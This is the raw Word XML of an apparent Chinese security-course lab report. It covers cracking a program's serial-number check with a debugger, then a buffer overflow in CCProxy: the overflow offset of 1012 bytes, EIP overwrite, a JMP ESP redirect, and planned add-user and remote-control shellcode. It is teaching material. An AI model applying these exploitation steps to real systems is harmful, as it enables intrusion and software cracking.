      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9070"/>
        </w:tabs>
        <w:spacing w:before="164" w:after="164"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9070"/>
        </w:tabs>
        <w:spacing w:before="164" w:after="164"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5749290" cy="2665730"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1270"/>
            <wp:docPr id="32" name="图片 3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tabs>
          <w:tab w:val="right" w:pos="9070"/>
        </w:tabs>
        <w:spacing w:before="164" w:after="164"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12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topLinePunct w:val="0"/>
        <w:ind w:left="48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4.按此方法依次设置断点，解第二三部分，可得到第二三部分序列号。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:left="480" w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12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第二部分是EAX存储正确序列号，第三部分是EDX存储正确序列号</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9070"/>
        </w:tabs>
        <w:spacing w:before="164" w:after="164"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="1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3538855</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>909955</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="655955" cy="147955"/>
                <wp:effectExtent l="9525" t="9525" r="10795" b="1397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39285" y="5711190"/>
                          <a:ext cx="655955" cy="1479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78.65pt;margin-top:71.65pt;height:11.65pt;width:51.65pt;z-index:251660288;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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GhYx1jZAAAACwEAAA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3ducmV2LnhtbFBLAQIUABQA&#10;AAAIAIdO4kCUk+MwYQIAAJUEAAAOAAAAAAAAAAEAIAAAACgBAABkcnMvZTJvRG9jLnhtbFBLBQYA&#10;AAAABgAGAFkBAAD7BQAAAAA=&#10;">
                <v:fill on="f" focussize="0,0"/>
                <v:stroke weight="1.5pt" color="#FF0000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Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4970780" cy="1871345"/>
            <wp:effectExtent l="0" t="0" r="1270" b="5080"/>
            <wp:docPr id="33" name="图片 3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078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tabs>
          <w:tab w:val="right" w:pos="9070"/>
        </w:tabs>
        <w:spacing w:before="164" w:after="164"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4236085" cy="2329180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="34" name="图片 3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4"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:srcRect b="30478"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4236085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tabs>
          <w:tab w:val="right" w:pos="9070"/>
        </w:tabs>
        <w:spacing w:before="164" w:after="164"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9070"/>
        </w:tabs>
        <w:spacing w:before="164" w:after="164"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="1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3416935</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>946785</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="428625" cy="75565"/>
                <wp:effectExtent l="6350" t="6350" r="12700" b="13335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17365" y="2519680"/>
                          <a:ext cx="428625" cy="755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9.05pt;margin-top:74.55pt;height:5.95pt;width:33.75pt;z-index:251661312;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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C1HdJE1wAAAAsBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAUAAAA&#10;CACHTuJA1Zn0AGECAACUBAAADgAAAAAAAAABACAAAAAmAQAAZHJzL2Uyb0RvYy54bWxQSwUGAAAA&#10;AAYABgBZAQAA+QUAAAAA&#10;">
                <v:fill on="f" focussize="0,0"/>
                <v:stroke weight="1pt" color="#FF0000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Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4246880" cy="2069465"/>
            <wp:effectExtent l="0" t="0" r="1270" b="6985"/>
            <wp:docPr id="35" name="图片 3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688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tabs>
          <w:tab w:val="right" w:pos="9070"/>
        </w:tabs>
        <w:spacing w:before="164" w:after="164"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4000500" cy="3038475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36" name="图片 3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6"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:srcRect l="38015" t="341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 w:val="0"/>
        <w:ind w:left="48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5.对于第四部分，上述方法失效，通过分析代码发现，第四部分中cmp eax，ecx，其中ecx是将正确序列号的前三部分进行相加后算术右移4位，而eax的值是[Local..86]即ss::[ebp-0x158],通过分析第一段序列号前的代码发现，该地址的值在第一部分序列号生成时就已经根据其内部算法生成，故第四部分是不可解的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:left="480" w:leftChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4040505" cy="2292985"/>
            <wp:effectExtent l="0" t="0" r="7620" b="2540"/>
            <wp:docPr id="37" name="图片 37" descr="8PS9[J}}MDCR4JEY{@VVX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8PS9[J}}MDCR4JEY{@VVX4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050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tabs>
          <w:tab w:val="right" w:pos="9070"/>
        </w:tabs>
        <w:spacing w:before="164" w:after="164"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3837305" cy="2688590"/>
            <wp:effectExtent l="0" t="0" r="1270" b="6985"/>
            <wp:docPr id="38" name="图片 38" descr="`OT7`12{}F)BQW[)$UT3KW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`OT7`12{}F)BQW[)$UT3KWR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8" w:after="328"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc54025136"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Win32漏洞实例分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="328" w:after="164"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc54025137"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验目的</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc54025138"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>掌握反汇编代码分析工具分析原理与使用方法；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>掌握缓冲区溢出的原理；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>掌握缓冲区溢出漏洞的利用技巧；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>理解缓冲区溢出漏洞的防范措施。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="328" w:after="164"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验要求</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc54025139"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试与掌握函数反汇编执行流程；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到并定位溢出点；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完成基本的添加用户Shellcode；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用缓冲区溢出执行ShellCode；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现一个具备远程连接控制功能的ShellCode(可选)。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="328" w:after="164"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">操作系统：Microsoft windows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7；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>溢出软件：CCPROXY；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>溢出工具：OllyDbg，Visual C++ 6.0。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:left="900"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="328" w:after="164"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc54025140"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验过程记录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420"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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>找到并定位溢出点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default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1.使用ping指令寻找溢出点，尝试字符串长度为1500时发生了溢出，使用二分法逐次查询溢出点的具体位置，最终当字符串为1012时恰好发生溢出。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5756910" cy="755015"/>
            <wp:effectExtent l="0" t="0" r="5715" b="6985"/>
            <wp:docPr id="1" name="图片 1" descr="KO}XOPJ[%(E(8$9~YMR48N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KO}XOPJ[%(E(8$9~YMR48NB"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:srcRect b="7080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ind w:left="420" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:lang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1983740</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>889635</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="661670" cy="121920"/>
                <wp:effectExtent l="6350" t="6350" r="8255" b="1460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84170" y="2150110"/>
                          <a:ext cx="661670" cy="1219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6.2pt;margin-top:70.05pt;height:9.6pt;width:52.1pt;z-index:251658240;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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KCl6dfYAAAACwEAAA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3ducmV2LnhtbFBLAQIUABQA&#10;AAAIAIdO4kBatjq0YgIAAJMEAAAOAAAAAAAAAAEAIAAAACcBAABkcnMvZTJvRG9jLnhtbFBLBQYA&#10;AAAABgAGAFkBAAD7BQAAAAA=&#10;">
                <v:fill on="f" focussize="0,0"/>
                <v:stroke weight="1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 w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5572125" cy="1485900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="{}75J7)MTQ0V84GHK$)C(Y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{}75J7)MTQ0V84GHK$)C(YR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ind w:left="420" w:leftChars="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2.使用OD观察EIP被溢出填充的过程，首先使用智能搜索查找“Host not Found”语句所在的内存地址，并在此处设置硬件执行断点，观察运行情况。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5747385" cy="690880"/>
            <wp:effectExtent l="0" t="0" r="5715" b="4445"/>
            <wp:docPr id="4" name="图片 4" descr="E4VG2}1%FG}_Y)5B[9TAG`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4VG2}1%FG}_Y)5B[9TAG`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ind w:left="420" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default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3.执行超长字符串a（超过1012个），成功在“Host not Found”处断了下来，按F8单步执行至该部分返回处“retn 0xc”处，观察到此时ESP地址所存的是61616161，即此时存放EIP地址的地方已被溢出的a覆盖，所以这里要将0x03CF66C4的内容修改为JMP ESP的地址，以保证shellcode的执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
